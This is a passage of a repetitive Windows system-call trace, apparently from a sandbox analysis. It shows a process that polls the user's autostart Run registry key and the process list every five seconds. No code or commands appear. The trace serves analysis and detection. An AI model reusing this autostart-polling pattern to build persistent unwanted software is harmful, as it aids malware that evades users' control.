KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.967] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.967] NtClose (Handle=0x154) returned 0x0 [0186.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.970] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.982] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.982] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.982] NtClose (Handle=0x154) returned 0x0 [0186.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.987] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.998] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.998] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.998] NtClose (Handle=0x154) returned 0x0 [0186.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.023] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.029] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.029] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.029] NtClose (Handle=0x154) returned 0x0 [0187.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.033] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.045] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.045] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.045] NtClose (Handle=0x154) returned 0x0 [0187.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.049] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.060] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.060] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.060] NtClose (Handle=0x154) returned 0x0 [0187.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.064] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.076] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.076] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.076] NtClose (Handle=0x154) returned 0x0 [0187.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.080] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.091] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.091] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.091] NtClose (Handle=0x154) returned 0x0 [0187.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.096] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.107] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.107] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.107] NtClose (Handle=0x154) returned 0x0 [0187.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.112] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.124] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.124] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.124] NtClose (Handle=0x154) returned 0x0 [0187.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.131] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.138] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.138] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.138] NtClose (Handle=0x154) returned 0x0 [0187.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.143] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.156] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.156] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.156] NtClose (Handle=0x154) returned 0x0 [0187.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.161] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.169] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.169] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.170] NtClose (Handle=0x154) returned 0x0 [0187.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.174] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.185] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.185] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.185] NtClose (Handle=0x154) returned 0x0 [0187.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, 